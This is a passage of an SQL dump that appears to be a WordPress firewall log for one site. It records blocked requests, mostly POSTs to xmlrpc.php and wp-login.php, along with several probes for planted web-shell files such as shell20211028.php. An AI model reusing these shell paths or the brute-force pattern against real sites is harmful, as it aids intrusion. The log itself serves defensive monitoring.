Safari\\/537.36\"}','gAl4F0vzHP2skcmpTNxtDCSO',0,1664465409.0094,4384,'','POST',403,0,515,0,1,'',0),('178.20.231.167',2987714471,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','npzuPXDY1fS0wlUdL8kMyaTC',0,1664465415.2413,555,'','POST',403,0,515,0,1,'',0),('184.168.116.151',3098047639,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','jg3zMK82TWVvCpxeharw95qG',0,1664465416.7178,495,'','POST',403,0,515,0,1,'',0),('37.251.155.62',637246270,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','Oyt4GEMKUcwXSHbzJgPakQmL',0,1664465427.0435,520,'','POST',403,0,515,0,1,'',0),('168.138.1.42',2827616554,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Ao9hM283OJp7c6wmyX4l0bge',0,1664465435.2670,1150,'','POST',403,0,515,0,1,'',0),('188.68.47.69',3158585157,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','EkzNKFhp7oQjRaP5WL2tTMwc',0,1664465435.6158,1011,'','POST',403,0,515,0,1,'',0),('139.59.227.94',2335957854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','aO8dLZscuBQCg3GvSlYo4mMp',0,1664465437.4754,502,'','POST',403,0,515,0,1,'',0),('118.27.125.16',1981512976,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','T2hdM54OLnQe9wgDWruUjbEi',0,1664465443.7213,612,'','POST',403,0,515,0,1,'',0),('212.91.94.100',3562757732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hP49V527gjvIDCEiNuUtYd3M',0,1664465448.7882,1122,'','POST',403,0,515,0,1,'',0),('185.107.112.126',3110826110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','fcrxRMWdznUQSX5qGKTNv7Hg',0,1664465448.3208,1968,'','POST',403,0,515,0,1,'',0),('178.20.231.167',2987714471,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','a4PmxzuJTgQXLkvpqUCFjY78',0,1664465460.4046,497,'','POST',403,0,515,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3tHjYSwXqn9DRLW126FckQa7',0,1664465779.5473,18904,'','POST',403,0,515,0,1,'',0),('62.102.148.162',1046910114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4jIdOqtH8WG5vnsiXL6TNkPl',0,1664466081.1128,9622,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ukXbBYG6Ad3l4w9mg7VtKRpy',0,1664466242.8589,1412,'','POST',403,0,515,0,1,'',0),('193.112.202.112',3245394544,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5s09n218cfiAXdJEMh4q73LS',0,1664466352.9553,1288,'','POST',403,0,515,0,1,'',0),('101.99.3.20',1700987668,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','8N0WmiMstfTvKOa1EbSBnwFr',0,1664466453.1143,1294,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','RFGrX8Ds4mcjy1J5eloEp0tC',0,1664466457.4690,575,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','5EFYwX1tZURIJOsoenzTuqMP',0,1664466463.9175,527,'','POST',403,0,515,0,1,'',0),('51.77.159.184',860725176,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','6oAChmyElOp73HikJXjQbWuM',0,1664466472.2894,2021,'','POST',403,0,515,0,1,'',0),('82.165.86.16',1386567184,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','b6qD7mXBFTldriKOjtWPHvsp',0,1664466472.8829,1645,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','JVqLfTNFOyt36DdSIkiuz2or',0,1664466472.2941,2532,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','hirSB5Ta1gfJ8l2zCduP3vLI',0,1664466479.2838,1108,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZongEDvqs4zGdwk91jAlCJX0',0,1664466478.9264,2093,'','POST',403,0,515,0,1,'',0),('208.109.68.254',3496822014,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','ZaVCNEQIAznByFjUO50Hg3Gd',0,1664466482.4993,642,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','iNIMcXC0OfAKLpHFV9zgyvJQ',0,1664466488.9949,1511,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','V1S5yEaCnpo0OMs3f7I8FxAL',0,1664466490.6520,563,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PdVX17v06aQ5mRhZfz9MCtr8',0,1664466492.3824,534,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2RkMQvWh7SmNb3qoLisfKHlj',0,1664466928.7852,1546,'','POST',403,0,515,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nD9ZOIisAfUj3GptVJLEyzdQ',0,1664466952.4517,309,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','WotYjDIXZg4RNyLSKUuM7aqr',0,1664466956.5065,276,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fdE45sv8SRnQXixV3OpkZLzh',0,1664466960.3460,341,'','GET',403,0,700,0,1,'',0),('176.9.74.94',2953398878,'','https://cteisys.com/wp-plain.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','EmgiF1oJpWdNz4D0ryTfvau5',0,1664466964.8618,275,'','GET',403,0,700,0,1,'',0),('64.42.179.59',1076540219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','w7gR2pGMVzKBtoHYy6sILJiS',0,1664467278.2556,1834,'','POST',403,0,515,0,1,'',0),('139.59.73.237',2335918573,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lyIH7MS9ufBgWP0X2FxrTkOs',0,1664467385.7344,1306,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Lm0zT4RWJEYlwApXDsjHakVF',0,1664467512.3477,10030,'','POST',403,0,515,0,1,'',0),('185.104.184.43',3110647851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Yy2m5FRNtjTVvW68DZnLd1zs',0,1664467675.2759,1351,'','POST',403,0,515,0,1,'',0),('66.29.138.73',1109232201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','moRfYJSOv7Ld3M5eNzkjEg2Q',0,1664467951.0099,7319,'','POST',403,0,515,0,1,'',0),('209.87.239.76',3512201036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OLDE6IsqWdUn35FHcYJ7rv1K',0,1664468085.4789,1838,'','POST',403,0,515,0,1,'',0),('82.102.28.107',1382423659,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vaIdDx5scj0Cm8UVYw2kOqri',0,1664468246.3539,18616,'','POST',403,0,515,0,1,'',0),('139.59.73.237',2335918573,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZoBf2UMhuL6reDtaEdH5znxq',0,1664468655.6314,1417,'','POST',403,0,515,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uyjVaQFek1ADi9hU45TWfBLr',0,1664469058.4571,1875,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Uu69cXlp0NF4iDahTYfyjnMO',0,1664469647.4979,1557,'','POST',403,0,515,0,1,'',0),('129.226.11.117',2179074933,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','ck4ELdTlr6I2MsjXCJ1a07Vh',0,1664469702.3610,862,'','POST',403,0,515,0,1,'',0),('64.227.190.34',1088667170,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','wHA7PoS6N8mQDLpT9kVXMCla',0,1664469702.9074,744,'','POST',403,0,515,0,1,'',0),('129.226.11.117',2179074933,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','3F7mgkiZMBVpyosTcY1JDAO5',0,1664469708.2561,1264,'','POST',403,0,515,0,1,'',0),('194.163.144.53',3265499189,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','0XQUp86aP9xErW2RKbZmTLjf',0,1664469714.4005,517,'','POST',403,0,515,0,1,'',0),('54.37.121.239',908425711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','5s8dFUfehDiNgCvn0Z1Y43br',0,1664469716.6500,543,'','POST',403,0,515,0,1,'',0),('89.163.146.52',1503892020,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','cNGVQl2n7fiLpT8tkP4dzA1I',0,1664469718.6264,461,'','POST',403,0,515,0,1,'',0),('66.33.205.144',1109511568,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','Ym93hXEx4ebMDafLZ0NiFUOk',0,1664469724.0331,529,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','GTQ28njoM6WvOPsiLFe7HE1d',0,1664469727.1644,518,'','POST',403,0,515,0,1,'',0),('118.27.125.16',1981512976,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','Pfk7VEuhxZm2K1gqFeHMX0Oi',0,1664469734.1883,471,'','POST',403,0,515,0,1,'',0),('185.107.113.41',3110826281,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','3SmgcopdtuAj2WR4Pba7XLfs',0,1664469741.3635,485,'','POST',403,0,515,0,1,'',0),('13.126.107.146',226388882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZDzhjlNcAJ5ux4idLvSMTy1a',0,1664469788.9540,1163,'','POST',403,0,515,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux i686) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','3eBcWlZ9KNUpQI1tqXhn6T0z',0,1664469945.0280,2105,'','POST',403,0,600,0,1,'',0),('45.149.77.114',764759410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MSG5EgJrpo3xf1ndbjVl2RWZ',0,1664470223.2397,20930,'','POST',403,0,515,0,1,'',0),('37.187.24.159',633018527,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Dx2CHOmNAFc9UhfT18Y0nzbp',0,1664470353.5764,1388,'','POST',403,0,515,0,1,'',0),('209.87.239.76',3512201036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VKH8NksAYGQmaCnlc1od5BfP',0,1664470777.1012,19401,'','POST',403,0,515,0,1,'',0),('158.255.80.210',2667532498,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0ogtp7rvRQM69i8sAfK3mWHy',0,1664470920.5759,1298,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','BTJdboG9VOgr62s8tcCI4PWy',0,1664471380.8145,558,'','POST',403,0,600,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NEShGFkQltb3fv7u0xAoZXTn',0,1664471478.2838,3039,'','POST',403,0,515,0,1,'',0),('87.236.20.246',1475089654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0TgRu9XmrFPBcGyUO5zs7ILW',0,1664471924.7493,2435,'','POST',403,0,515,0,1,'',0),('51.75.146.208',860590800,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bag2Mq47sRWAz9Uji50KPeoc',0,1664472035.4057,556,'','POST',403,0,515,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mUlq4hHDMwVKv61Jpx8n7sGN',0,1664472425.1583,18563,'','POST',403,0,515,0,1,'',0),('159.89.2.220',2673410780,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NePotLYEHyMzhbruUfvCRqXB',0,1664472526.6212,1628,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MOCcR8xL3jGUqPENi4HJrB0e',0,1664472977.8933,18400,'','POST',403,0,515,0,1,'',0),('162.241.217.237',2733758957,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','v35prtUmEaqCVD9xsonWkuHQ',0,1664473319.5487,18756,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','U90L2TzpxmGPF6ceQjNZyoB1',0,1664473364.4910,2656,'','POST',403,0,515,0,1,'',0),('184.154.69.85',3097118037,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6S1203lsc4TeKoPMIVCvrqAd',0,1664473670.8774,21755,'','POST',403,0,515,0,1,'',0),('114.132.201.19',1921304851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bEIS5yNcmxsG64LHjwWqhzJ3',0,1664473743.2103,18136,'','POST',403,0,515,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I31cDULPFw8AakRGtnXzv4TY',0,1664474012.7876,18673,'','POST',403,0,515,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GT5fWPR8vZMgyJxL47CVeilt',0,1664474382.6938,18820,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7lZDT1KLBu8bXc2x6wFhvGoS',0,1664474462.2968,3334,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lT3tv8uEFe2zsfxS4qYWXamP',0,1664474710.8797,19087,'','POST',403,0,515,0,1,'',0),('161.35.103.104',2703452008,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3onVJqMlkDLwb8sSUTdNK1EC',0,1664474821.5918,9481,'','POST',403,0,515,0,1,'',0),('18.224.85.64',316691776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DPpdNh87MjbWiFTwgxaUKEH0',0,1664475178.0756,2492,'','POST',403,0,515,0,1,'',0),('5.101.156.45',90545197,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OzwFXolSGEj4upx061Z5rBnI',0,1664475847.6743,18721,'','POST',403,0,515,0,1,'',0),('61.12.67.132',1024213892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gDiyTnkqomhve8SGK1sRI4Wr',0,1664475910.9929,1689,'','POST',403,0,515,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','7zhbWNwrpCJ3ABvUKHo1YiLV',0,1664476217.3691,1541,'','POST',403,0,600,0,1,'',0),('5.101.156.45',90545197,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UW9mlr3a6TDMBtkf4pozyOYv',0,1664476218.5064,2122,'','POST',403,0,515,0,1,'',0),('162.241.148.12',2733741068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FTG2IlPxuBE9HwR07ADWkoY1',0,1664476305.0211,1245,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lJcDOWK8xT4srCASmHgye359',0,1664476569.7723,17274,'','POST',403,0,515,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GQlh14pImRVHyXcKUNTtF7gn',0,1664477365.9883,19608,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tiasZYIyTDuhnS3Ug0dVbP98',0,1664477628.9468,1462,'','POST',403,0,515,0,1,'',0),('67.225.255.231',1138884583,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s1NWyR08e2S3KhbzijurGxO4',0,1664477694.9887,1385,'','POST',403,0,515,0,1,'',0),('39.107.137.177',661359025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','d2LYVIl4AUgRq5iPcrTnzN63',0,1664478031.1444,18961,'','POST',403,0,515,0,1,'',0),('90.156.169.12',1520216332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7rq6YvIicHNhDwOAma3ZgbMW',0,1664478603.1317,18661,'','POST',403,0,515,0,1,'',0),('147.182.150.188',2478216892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CLDtyFW846XsupmafZVhP0jT',0,1664478655.5387,1187,'','POST',403,0,515,0,1,'',0),('178.128.85.69',2994754885,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xQp7uN5qT840B2HbUmXMtaEC',0,1664478900.3642,1353,'','POST',403,0,515,0,1,'',0),('81.88.52.223',1364735199,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 